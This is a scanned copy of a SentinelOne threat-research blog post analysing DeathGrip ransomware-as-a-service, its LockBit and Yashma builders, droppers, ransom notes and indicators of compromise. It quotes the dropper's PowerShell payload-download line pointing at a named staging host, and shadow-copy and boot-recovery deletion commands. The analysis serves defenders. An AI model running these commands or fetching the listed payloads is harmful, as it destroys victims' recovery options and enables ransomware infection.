www.sentinelone.com
Open in
urlscan Pro
104.26.2.18
Public Scan
Submitted URL: http://sentinelone.com/blog/deathgrip-raas-small-time-threat-actors-aim-high-with-lockbit-yashma-builders
Effective URL: https://www.sentinelone.com/blog/deathgrip-raas-small-time-threat-actors-aim-high-with-lockbit-yashma-builders/
Submission: On August 12 via api from DE — Scanned from DE
Effective URL: https://www.sentinelone.com/blog/deathgrip-raas-small-time-threat-actors-aim-high-with-lockbit-yashma-builders/
Submission: On August 12 via api from DE — Scanned from DE
Form analysis 6 forms found in the DOM
GET https://www.sentinelone.com
<form autocomplete="off" method="get" action="https://www.sentinelone.com">
<fieldset>
<input type="search" name="s" placeholder="Search ..." value="">
<button class="search" type="submit">
<img class="lazy icon-search" src="data:image/svg+xml;utf8,<svg xmlns='http://www.w3.org/2000/svg' width='24' height='24'><rect width='100%' height='100%' fill='none'/></svg>" style=""
data-src="https://www.sentinelone.com/wp-content/themes/sentinelone/carbine/assets/svg/search-icon.svg" alt="Search Icon" width="24" height="24">
<img class="lazy icon-down" src="data:image/svg+xml;utf8,<svg xmlns='http://www.w3.org/2000/svg' width='18' height='16'><rect width='100%' height='100%' fill='none'/></svg>" style=""
data-src="https://www.sentinelone.com/wp-content/themes/sentinelone/carbine/assets/svg/navigation-close-dark.svg" alt="Navigation Close Dark" width="18" height="16">
</button>
</fieldset>
</form>GET https://www.sentinelone.com/
<form role="search" method="get" class="search-form" action="https://www.sentinelone.com/">
<label>
<span class="screen-reader-text">Search ...</span>
<input type="search" class="search-field" placeholder="Search ..." value="" name="s">
</label>
<input type="submit" class="search-submit" value="Search">
</form><form id="mktoForm_1985" novalidate="novalidate" class="mktoForm mktoHasWidth mktoLayoutLeft" style="font-family: inherit; font-size: 13px; color: rgb(51, 51, 51); width: 1601px;">
<style type="text/css"></style>
<div class="mktoFormRow">
<div class="mktoFieldDescriptor mktoFormCol" style="margin-bottom: 5px;">
<div class="mktoOffset" style="width: 5px;"></div>
<div class="mktoFieldWrap mktoRequiredField"><label for="Email" id="LblEmail" class="mktoLabel mktoHasWidth" style="width: 0px;">
<div class="mktoAsterix">*</div>
</label>
<div class="mktoGutter mktoHasWidth" style="width: 5px;"></div><input id="Email" name="Email" placeholder="Business Email" maxlength="255" aria-labelledby="LblEmail InstructEmail" type="email"
class="mktoField mktoEmailField mktoHasWidth mktoRequired" aria-required="true" style="width: 150px;"><span id="InstructEmail" tabindex="-1" class="mktoInstruction"></span>
<div class="mktoClear"></div>
</div>
<div class="mktoClear"></div>
</div>
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="Employees__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="Industry" class="mktoField mktoFieldDescriptor mktoFormCol" value="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="AnnualRevenue" class="mktoField mktoFieldDescriptor mktoFormCol" value="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="Address" class="mktoField mktoFieldDescriptor mktoFormCol" value="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="City" class="mktoField mktoFieldDescriptor mktoFormCol" value="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="PostalCode" class="mktoField mktoFieldDescriptor mktoFormCol" value="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="SIC_Code2__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="Website" class="mktoField mktoFieldDescriptor mktoFormCol" value="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="demandbaseSID" class="mktoField mktoFieldDescriptor mktoFormCol" value="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="Phone" class="mktoField mktoFieldDescriptor mktoFormCol" value="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="demandbaseCompany" class="mktoField mktoFieldDescriptor mktoFormCol" value="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="demandbaseCountry" class="mktoField mktoFieldDescriptor mktoFormCol" value="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="demandbaseState" class="mktoField mktoFieldDescriptor mktoFormCol" value="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="demandbaseEmployeeRange" class="mktoField mktoFieldDescriptor mktoFormCol" value="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="subIndustry" class="mktoField mktoFieldDescriptor mktoFormCol" value="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="dataSource" class="mktoField mktoFieldDescriptor mktoFormCol" value="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="watchListAccountType" class="mktoField mktoFieldDescriptor mktoFormCol" value="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="watchListAccountOwner" class="mktoField mktoFieldDescriptor mktoFormCol" value="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="watchListAccountStatus" class="mktoField mktoFieldDescriptor mktoFormCol" value="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="watchListCampaignCode" class="mktoField mktoFieldDescriptor mktoFormCol" value="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoButtonRow"><span class="mktoButtonWrap mktoNative" style="margin-left: 110px;"><button type="submit" class="mktoButton">Subscribe</button></span></div>
<div class="marketo-legal">By clicking Subscribe, I agree to the use of my personal data in accordance with SentinelOne <a href="/legal/privacy-notice/">Privacy Notice</a>. SentinelOne will not sell, trade, lease, or rent your personal data to
third parties. This site is protected by reCAPTCHA and the <a href="https://policies.google.com/privacy" target="_blank">Google Privacy Policy</a> and <a href="https://policies.google.com/terms" target="_blank">Terms of Service</a> apply.</div>
<input type="hidden" name="formid" class="mktoField mktoFieldDescriptor" value="1985"><input type="hidden" name="munchkinId" class="mktoField mktoFieldDescriptor" value="327-MNM-087">
</form><form id="mktoForm_2816" novalidate="novalidate" class="mktoForm mktoHasWidth mktoLayoutLeft" style="font-family: inherit; font-size: 13px; color: rgb(51, 51, 51); width: 1601px;">
<style type="text/css"></style>
<div class="mktoFormRow">
<div class="mktoFieldDescriptor mktoFormCol" style="margin-bottom: 5px;">
<div class="mktoOffset" style="width: 5px;"></div>
<div class="mktoFieldWrap mktoRequiredField"><label for="Email" id="LblEmail" class="mktoLabel mktoHasWidth" style="width: 0px;">
<div class="mktoAsterix">*</div>
</label>
<div class="mktoGutter mktoHasWidth" style="width: 5px;"></div><input id="Email" name="Email" placeholder="Business Email" maxlength="255" aria-labelledby="LblEmail InstructEmail" type="email"
class="mktoField mktoEmailField mktoHasWidth mktoRequired" aria-required="true" style="width: 164px;"><span id="InstructEmail" tabindex="-1" class="mktoInstruction"></span>
<div class="mktoClear"></div>
</div>
<div class="mktoClear"></div>
</div>
<div class="mktoClear"></div>
</div>
<div class="mktoButtonRow"><span class="mktoButtonWrap mktoNative" style="margin-left: 110px;"><button type="submit" class="mktoButton">Subscribe</button></span></div>
<div class="marketo-legal">By clicking Subscribe, I agree to the use of my personal data in accordance with SentinelOne <a href="/legal/privacy-notice/">Privacy Notice</a>. SentinelOne will not sell, trade, lease, or rent your personal data to
third parties. This site is protected by reCAPTCHA and the <a href="https://policies.google.com/privacy" target="_blank">Google Privacy Policy</a> and <a href="https://policies.google.com/terms" target="_blank">Terms of Service</a> apply.</div>
<input type="hidden" name="formid" class="mktoField mktoFieldDescriptor" value="2816"><input type="hidden" name="munchkinId" class="mktoField mktoFieldDescriptor" value="327-MNM-087">
</form><form novalidate="novalidate" class="mktoForm mktoHasWidth mktoLayoutLeft" style="font-family: inherit; font-size: 13px; color: rgb(51, 51, 51); visibility: hidden; position: absolute; top: -500px; left: -1000px; width: 1600px;"></form><form novalidate="novalidate" class="mktoForm mktoHasWidth mktoLayoutLeft" style="font-family: inherit; font-size: 13px; color: rgb(51, 51, 51); visibility: hidden; position: absolute; top: -500px; left: -1000px; width: 1600px;"></form>Text Content
Experiencing an Incident? We’re here to help: 1-855-868-3733 Contact Us
Experiencing an Incident? 1-855-868-3733
Experiencing a Breach?
* 1-855-868-3733
* Small Business
* Contact
* Cybersecurity Blog
en
* English
* 日本語
* Deutsch
* Español
* Français
* Italiano
* Dutch
* 한국어
blog
Platform
* Platform Overview
* Singularity Platform Welcome to Integrated
Enterprise Security
* How It Works The Singularity XDR Difference
* Singularity Marketplace One-Click Integrations to Unlock the Power of XDR
* Pricing & Packaging Comparisons and Guidance at a Glance
* Data & AI
* Purple AI Accelerate SecOps with Generative AI
* AI-SIEM The AI SIEM for the Autonomous SOC
* Singularity Data Lake AI-Powered, Unified
Data Lake
* Singularity Data Lake for Log Analytics Seamlessly ingest data
from on-prem, cloud or hybrid environments
* Endpoint Security
* Singularity Endpoint Autonomous Prevention, Detection, and Response
* Singularity XDR Native & Open Protection, Detection, and Response
* Singularity RemoteOps Forensics Orchestrate Forensics at Scale
* Singularity
Threat Intelligence Comprehensive Adversary Intelligence
* Singularity Vulnerability Management Application & Os Vulnerability
Management
* Cloud Security
* Singularity Cloud Security Block Attacks With an
AI-powered CNAPP
* Singularity Cloud
Native Security Secure Cloud and Development Resources
* Singularity Cloud Workload Security Real-Time Cloud Workload Protection
Platform
* Singularity
Cloud Data Security AI-Powered Threat Detection for Cloud Storage
* Identity Security
* Singularity Identity Identity Threat Detection
and Response
* Singularity Hologram Deception Protection
Why SentinelOne?
* Why SentinelOne?
* Why SentinelOne? Cybersecurity Built
for What’s Next
* Our Customers Trusted by the World’s Leading Enterprises
* Industry Recognition Tested and Proven
by the Experts
* About Us The Industry Leader in Autonomous Cybersecurity
* Compare SentinelOne
* CrowdStrike Cyber Dependent
on a Crowd
* Wiz Smoke, Mirrors and
No Scale or Protection
* Microsoft Platform Coverage
That Compromises
* McAfee Pale Performance,
More Maintenance
* Palo Alto Networks Hard to Deploy,
Harder to Manage
* Trend Micro The Risk of DevOps Disruption
* Symantec Security Limited
to Signatures
* Carbon Black Adapt Only as Quickly
as Your Block Lists
* Verticals
* Energy
* Federal Government
* Finance
* Healthcare
* Higher Education
* K-12 Education
* Manufacturing
* Retail
Services
* Strategic Services
* PinnacleOne Strategic Advisory Group
Services Overview
* Managed Services
* Singularity MDR Tailored End-to-End MDR Service with Coverage on the
Endpoint and Beyond
* Vigilance MDR Essential 24x7 MDR Service with Reliable Endpoint Coverage
* Vigilance MDR+DFIR Essential 24x7 MDR Service with Extended DFIR Coverage
* WatchTower Pro Threat Hunting for Emerging Threat Campaigns
* Support, Deployment, & Health
* Technical Account Management Customer Success with Personalized Service
* SentinelOne GO Guided Onboarding & Deployment Advisory
* SentinelOne University Live and On-Demand Training
* Support Services Tiered Support Options for Every Organization
* SentinelOne Community Community Login
Partners
* Our Network
* MSSP Partners Succeed Faster
with SentinelOne
* Singularity Marketplace Extend the Power
of S1 Technology
* Cyber Risk
Partners Enlist Pro Response
and Advisory Teams
* Technology Alliances Integrated, Enterprise-Scale Solutions
* SentinelOne for AWS Hosted in AWS Regions Around the World
* Channel Partners Deliver the Right
Solutions, Together
Program Overview
Resources
* Resource Center
* Case Studies
* Data Sheets
* eBooks
* Reports
* Videos
* Webinars
* White Papers
View All Resources
* Blog
* Feature Spotlight
* For CISO/CIO
* From the Front Lines
* Identity
* Cloud
* macOS
* SentinelOne Blog
Blog
* Tech Resources
* SentinelLABS
* Ransomware Anthology
* Cybersecurity 101
About
* About SentinelOne
* About SentinelOne The Industry Leader in Cybersecurity
* Investor Relations Financial Information & Events
* SentinelLABS Threat Research for
the Modern Threat Hunter
* Careers The Latest Job Opportunities
* Press & News Company Announcements
* Cybersecurity Blog The Latest Cybersecurity Threats, News, & More
* F1 Racing SentinelOne &
Aston Martin F1 Team
* FAQ Get Answers to Our Most Frequently Asked Questions
* DataSet The Live Data Platform
* S Foundation Securing a Safer Future for All
* S Ventures Investing in the Next Generation
of Security and Data
en
* English
* 日本語
* Deutsch
* Español
* Français
* Italiano
* Dutch
* 한국어
Get a Demo
DEATHGRIP RAAS | SMALL-TIME THREAT ACTORS AIM HIGH WITH LOCKBIT & YASHMA
BUILDERS
August 8, 2024
by Jim Walter
PDF
The infosec community continues to eye a worrying trend: how the barrier to
entry for extortion-focused cybercriminals is nearly non-existent. With a wide
selection of ransomware builders and resources now readily available, new and
malicious operations are emerging at an alarming rate.
One operation in particular called DeathGrip ransomware made its debut in June
this year. Operating as a Ransomware-as-a-Service (RaaS), DeathGrip offers
would-be threat actors on the darkweb sophisticated ransomware tools, including
LockBit 3.0 and Yashma/Chaos builders. This ease of access allows even those
with minimal technical skills to deploy fully-developed ransomware attacks.
Promoting their services through Telegram and other underground forums,
DeathGrip RaaS has quickly become a notable player in the cybercrime world.
Their payloads, crafted using leaked ransomware builders, are already being
observed in real-world attacks. This blog post explores the rise of this
ransomware outfit and analyzes the threats posed by their use of LockBit and
Yashma/Chaos-based payloads.
RANSOMWARE ACCESSIBILITY | HOW BUILDERS EMPOWER CYBERCRIMINALS
The proliferation of these ransomware builder tools allows for the ongoing
commoditization of ransomware across the spectrum of capability. Like DeathGrip,
other groups like IkaruzRT and NullBulge are also examples of exactly this.
While IkaruzRT and NullBulge are more niche examples, larger attacks have also
been occurring with these same tools, including DragonForce’s use of LockBit
builders. More recently, a Brain Cipher ransomware attack caused a disruption at
the National Data Center in Indonesia. Brain Cipher is also based on the LockBit
builder. In terms of destructive potential, these smaller operations are every
bit as capable as the ‘big game’ operations.
A PEEK INTO DEATHGRIP RANSOMWARE OPERATIONS
DeathGrip ransomware emerged in late June 2024, advertising through Telegram
channels. The first run of advertisements were subsequently echoed throughout
various channels and forums. This service was initially tagged with the contact
@PayloadDev. Some of the post-infection artifacts also cite an identity Team
RansomVerse.
Ransomware builders shared across Telegram
Currently, the group does not host a data leak site (DLS) or other central hub
for monetizing victim data. As of this writing, victims are instructed to engage
the attacker via Telegram per the instructions in DeathGrip’s ransom notes.
DeathGrip ransomware 1.0 announcement
As an RaaS model, DeathGrip ransomware offers the following features in their
initial launch:
Encryption and File Handling
* Utilizing the AES-256 CGM algorithm for file encryption
* Offering two encryption modes:
* Encrypting all files
* Encrypting files with specific extensions
* Removing backups and restore points to prevent easy recovery
Security Evasion Techniques
* Implementing UAC bypass to gain elevated privileges
* Employing anti-virtual environment measures
* Access to anti-emulator and anti-debugger functionality
* Detecting and preventing execution in sandboxes, including ANY.RUN
* Incorporating anti-CIS (Commonwealth of Independent States) measures to avoid
infecting systems in CIS countries
System Manipulation
* Disabling specific processes
* Creating a startup task manager entry for persistence
* Allowing customization of file properties and icons
* Capabilities for disabling specified Windows services
DeathGrip ransomware was advertised across multiple Telegram channels including
t[.]me/MalwareWhiteList, t[.]me/TrojanLab, and t[.]me/ransomservice.
DeathGrip ransomware on Trojan Lab (Telegram)
As an aside, it is worth noting that the post in Trojan Lab includes a
VirusTotal (VT) link to an associated Dropper.bat file
(d24fc282fb660945b87e1c41860a031f6e7ec9f6). While threat actors will sometimes
link to more anonymous scan results to increase confidence in their offerings,
it is not common for them to link directly to a VT sample in this way due to
lack of anonymity and high visibility to the security research community.
The reason for this is that when a threat actor posts a direct VT link to their
product for advertising purposes, it opens them up to a great deal of scrutiny
within the offensive community. Everything about that sample is visible and can
be reviewed at the benefit or detriment of the threat actor.
Additionally, it makes the sample and any related metadata available to the
public and security researchers have direct access to the samples. It is more
common for threat actors to link to or screenshot detections results from more
anonymized services that are not attached to a community of security defenders
and vendors (e.g., scanner[.]to).
DeathGrip ransom promoted on malware whitelist (Telegram)
DEATHGRIP SAMPLES IN THE WILD
Initially observed DeathGrip samples are based on the leaked LockBit 3.0
builder. They are distributed as bundled self-extracting .scr files. Upon
execution, these droppers retrieve and execute the LockBit-based ransomware
payloads.
One observed example (2d566a2b94fc8b16b97200392db1bbe714c31289) was deployed
from a bundle hosted at master-repogen.vercell[.]app. The LockBit-based
ransomware displayed the following ransom note on encrypted systems.
DeathGrip ransomware ransom note (LockBit version) DeathGrip ransomware ransom
note (LockBit version)
Beyond the group’s modifications to the LockBit ransom note, the payloads are
standard LockBit 3.0 / LockBit Black. The group includes their Telegram channel
details, but leaves the legacy LockBit recovery URLs intact.
Chaos/Yashma versions of DeathGrip ransomware have also been observed. These are
distributed via the same host (master-repogen.vercell[.]app).
DeathGrip ransomware distribution of Yashma builder Yashma ransomware builder
DeathGrip payloads such as fc9548f91123e05196dad6bcab11d29abd01500c, based on
Yashma/Chaos, have been observed in the wild as well.
EXTRACTING DEATHGRIP PAYLOADS
DeathGrip ransomware payloads, both the LockBit and Chaos/Yashma versions, are
distributed as self-extracting WinRAR bundles. The bundles consist of a dropper
batch file along with a .JPG file which is displayed upon infection via the
DeathGrip logo. The dropper is responsible for retrieving the payloads from the
remote staging server and then executing them.
Bundled DeathGrip ransomware payload (LockBit version) Extracted DeathGrip
Dropper and “death” logo
The included Dropper.bat file retrieves the ransomware payload from
https[:]//master-repogen.vercel[.]app. Basic powershell commands are used to
retrieve the payloads. For example:
(powershell -Command "(New-Object System.Net.WebClient).DownloadFile('%url%', '%downloadsFolder%\%filename%')")
With DeathGrip malware payloads, the threat actor is altering the file
downloaded from the remote staging server to deliver different payloads. The
“server.scr” example below delivers the groups’ LockBit-based payloads.
Yashma/Chaos builders were observed as well being pulled from similar droppers
with modified Dropper.bat files (e.g., Yashma/Chaos payloads seen distributed as
“tmk.scr”).
DeathGrip ransomware dropper.bat (LockBit version) DeathGrip ransomware
dropper.bat (Yashma/Chaos version)
Upon execution, the ‘death.jpg’ is displayed, whilst the .bat file retrieves and
launches the ransomware payload.
DeathGrip .jpg displayed upon execution
The Chaos/Yashma variations of DeathGrip ransomware write a copy of themselves
to %AppData%\Roaming\Console Window Host.exe. All further malicious behaviors
are initiated from this instance of the payload executable. This behavior is
consistent with other ransomware based on Yashma/Chaos. These payloads require
elevated privileges. If required, a UAC prompt will be presented to the logged
in user.
DeathGrip ransomware UAC prompt
DeathGrip ransomware processes via deep visibility
Once fully launched, the malware will proceed to encrypt files on disk along
with displaying the ransom note and modifying the desktop wallpaper.
DeathGrip ransomware wallpaper modification
Ransom notes, for these variants, are written to all locations containing
encrypted files. The ransom notes are written as read_it.txt for all observed
DeathGrip ransomware variants.
DeathGrip ransom note (Chaos version)
Ransom amounts vary across samples. However, compared to big game ransomware
operations such as Play, DungHill, and Inc, the ransom demands are very low.
Commonly observed ransom amounts for DeathGrip ransomware are $100.00 USD and
$1000.00 USD – both low amounts when considering today’s ransomware landscape
and recent record-breaking ransoms.
Upon launch of the ransomware payloads, multiple additional system changes are
carried out. The following System Recovery Manipulation (T1490) commands are
observed:
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
bcdedit.exe /set {default} recoveryenabled no
wbadmin.exe delete catalog -quiet
Next, the following Volume Shadow Copy (VSS) Removal / Manipulation (T1490)
commands are observed:
vssadmin.exe delete shadows /all /quiet
WMIC.exe shadowcopy delete
DeathGrip ransomware (Chaos) process tree
Infected files are finally updated with the .deathgrip or .DeathGrip extension
once encryption is complete.
CONCLUSION
As groups like DeathGrip continue to proliferate, the appeal of turn-key
ransomware and extortion-based campaigns grows among the cyber threat
underground. The combination of easy access to sophisticated tools, leaked
builders, and a variety of platforms that support the monetization of stolen
data has made this kind of criminal model highly attractive.
We continue to see these tools becoming commoditized by threat actors.
Hacktivists and niche operators are using them to disrupt operations of their
target and spread their causes. Larger operations such as Brain Cipher and
DarkVault have been tied to notable attacks featuring the LockBit builder. There
are analogs with Babuk and Slam builders, Kryptina RaaS, as well the
aforementioned Chaos/Yashma builder.
DeathGrip ransomware is just the latest example of a broader trend where
malicious actors often rely on readily available, cost-effective resources
rather than developing bespoke, cutting-edge tools. While the technologies they
are using are not revolutionary by any means, they are effective enough to cause
significant damage, disruption, and profit losses. We expect this trend to
continue with an increasing number of smaller threat operators leveraging these
tools to ‘punch up’ into more significant attack dynamics.
SentinelOne’s Singularity™ Platform is capable of detecting and preventing
malicious activities and payloads associated with DeathGrip ransomware. To learn
more, book a demo or contact us today.
INDICATORS OF COMPROMISE
SHA1
2d566a2b94fc8b16b97200392db1bbe714c31289 DeathGrip (LockBit)
560065e8fbc3eb7743c74d3300d73db16141fd1f DeathGrip (Chaos/Yashma)
96c375b9c57292db73c7ef2f2df16cf7be1604bb DeathGrip (LockBit)
d24fc282fb660945b87e1c41860a031f6e7ec9f6 dropper.bat
fc9548f91123e05196dad6bcab11d29abd01500c DeathGrip (Chaos/Yashma)
NETWORK
https[:]//master-repogen.vercel[.]app/file/server.scr
https[:]//master-repogen.vercel[.]app/file/tmk.scr
SentinelOne Singularity XDR
See how SentinelOne XDR provides end-to-end enterprise visibility, powerful
analytics, and automated response across your complete technology stack.
Learn More
--------------------------------------------------------------------------------
Like this article? Follow us on LinkedIn, Twitter, YouTube or Facebook to see
the content we post.
READ MORE ABOUT CYBER SECURITY
* Threat Actor Interplay | Good Day’s Victim Portals and Their Ties to Cloak
* DPRK Crypto Theft | macOS RustBucket Droppers Pivot to Deliver KandyKorn
Payloads
* macOS MetaStealer | New Family of Obfuscated Go Infostealers Spread in
Targeted Attacks
* Kryptina RaaS | From Underground Commodity to Open Source Threat
* January 2024 Cybercrime Update | Exploitation of Known CVEs, Crypto Drainers
& Ransomware Updates
* XLoader’s Latest Trick | New macOS Variant Disguised as Signed OfficeNote App
READ MORE
Get a demo
Defeat every attack, at every stage of the threat lifecycle with SentinelOne
Book a demo and see the world’s most advanced cybersecurity platform in action.
Get Demo
SentinelLabs
SentinelLabs: Threat Intel & Malware Analysis
We are hunters, reversers, exploit developers, & tinkerers shedding light on the
vast world of malware, exploits, APTs, & cybercrime across all platforms.
VISIT SITE
Wizard Spider and Sandworm
MITRE Engenuity ATT&CK Evaluation Results
SentinelOne leads in the latest Evaluation with 100% prevention. Leading
analytic coverage. Leading visibility. Zero detection delays.
SEE RESULTS
LISTEN TO THIS POST
Table of Contents
Ransomware Accessibility | How Builders Empower Cybercriminals
* Ransomware Accessibility | How Builders Empower Cybercriminals
* A Peek into DeathGrip Ransomware Operations
* DeathGrip Samples in the Wild
* Extracting DeathGrip Payloads
* Conclusion
* Indicators of Compromise
SEARCH
Search ...
SIGN UP
Keep up to date with our weekly digest of articles.
*
Subscribe
By clicking Subscribe, I agree to the use of my personal data in accordance with
SentinelOne Privacy Notice. SentinelOne will not sell, trade, lease, or rent
your personal data to third parties. This site is protected by reCAPTCHA and the
Google Privacy Policy and Terms of Service apply.
Thanks! Keep an eye out for new content!
RECENT POSTS
* The Good, the Bad and the Ugly in Cybersecurity – Week 32
August 9, 2024
* Defusing AD-Based Risks | Best Practices for Securing Modern Directory
Services
August 7, 2024
* PinnacleOne ExecBrief | The Escalation of Nation-State Sabotage and Its
Implications for the Private Sector
August 5, 2024
BLOG CATEGORIES
* Cloud
* Company
* Data Platform
* Feature Spotlight
* For CISO/CIO
* From the Front Lines
* Identity
* Integrations & Partners
* macOS
* PinnacleOne
* The Good, the Bad and the Ugly
©2024 SentinelOne, All Rights Reserved.
Privacy Notice Master Subscription Agreement
Company
* Our Customers
* Why SentinelOne
* Platform
* About
* Partners
* Support
* Careers
* Legal & Compliance
* Security & Compliance
* Contact Us
* Investor Relations
Resources
* Blog
* Labs
* Product Tour
* Press
* News
* FAQ
* Resources
* Ransomware Anthology
Global Headquarters
444 Castro Street
Suite 400
Mountain View, CA 94041
+1-855-868-3733
sales@sentinelone.com
Sign Up For Our Newsletter
*
Subscribe
By clicking Subscribe, I agree to the use of my personal data in accordance with
SentinelOne Privacy Notice. SentinelOne will not sell, trade, lease, or rent
your personal data to third parties. This site is protected by reCAPTCHA and the
Google Privacy Policy and Terms of Service apply.
Thank you! You will now receive our weekly newsletter with all recent blog
posts. See you soon!
Language
English
* English
* 日本語
* Deutsch
* Español
* Français
* Italiano
* Dutch
* 한국어
PRIVACY PREFERENCE CENTER
When you visit any website, it may store or retrieve information on your
browser, mostly in the form of cookies. This information might be about you,
your preferences or your device and is mostly used to make the site work as you
expect it to. The information does not usually directly identify you, but it can
give you a more personalized web experience. Because we respect your right to
privacy, you can choose not to allow some types of cookies. Click on the
different category headings to find out more and change our default settings.
However, blocking some types of cookies may impact your experience of the site
and the services we are able to offer.
More information
Allow All
MANAGE CONSENT PREFERENCES
FUNCTIONAL COOKIES
Functional Cookies
These cookies enable the website to provide enhanced functionality and
personalisation. They may be set by us or by third party providers whose
services we have added to our pages. If you do not allow these cookies then some
or all of these services may not function properly.
STRICTLY NECESSARY COOKIES
Always Active
These cookies are necessary for the website to function and cannot be switched
off in our systems. They are usually only set in response to actions made by you
which amount to a request for services, such as setting your privacy
preferences, logging in or filling in forms. You can set your browser to block
or alert you about these cookies, but some parts of the site will not then work.
These cookies do not store any personally identifiable information.
PERFORMANCE COOKIES
Performance Cookies
These cookies allow us to count visits and traffic sources so we can measure and
improve the performance of our site. They help us to know which pages are the
most and least popular and see how visitors move around the site. All
information these cookies collect is aggregated and therefore anonymous. If you
do not allow these cookies we will not know when you have visited our site, and
will not be able to monitor its performance.
TARGETING COOKIES
Targeting Cookies
These cookies may be set through our site by our advertising partners. They may
be used by those companies to build a profile of your interests and show you
relevant adverts on other sites. They do not store directly personal
information, but are based on uniquely identifying your browser and internet
device. If you do not allow these cookies, you will experience less targeted
advertising.
Back Button Back
Vendor Search Search Icon
Filter Icon
Clear
checkbox label label
Apply Cancel
Consent Leg.Interest
checkbox label label
checkbox label label
checkbox label label
Confirm My Choices
By clicking “Accept All Cookies”, you agree to the storing of cookies on your
device to enhance site navigation, analyze site usage, and assist in our
marketing efforts.
Cookies Settings Accept All Cookies
We'd like to show you notifications for the latest news and updates.
AllowCancel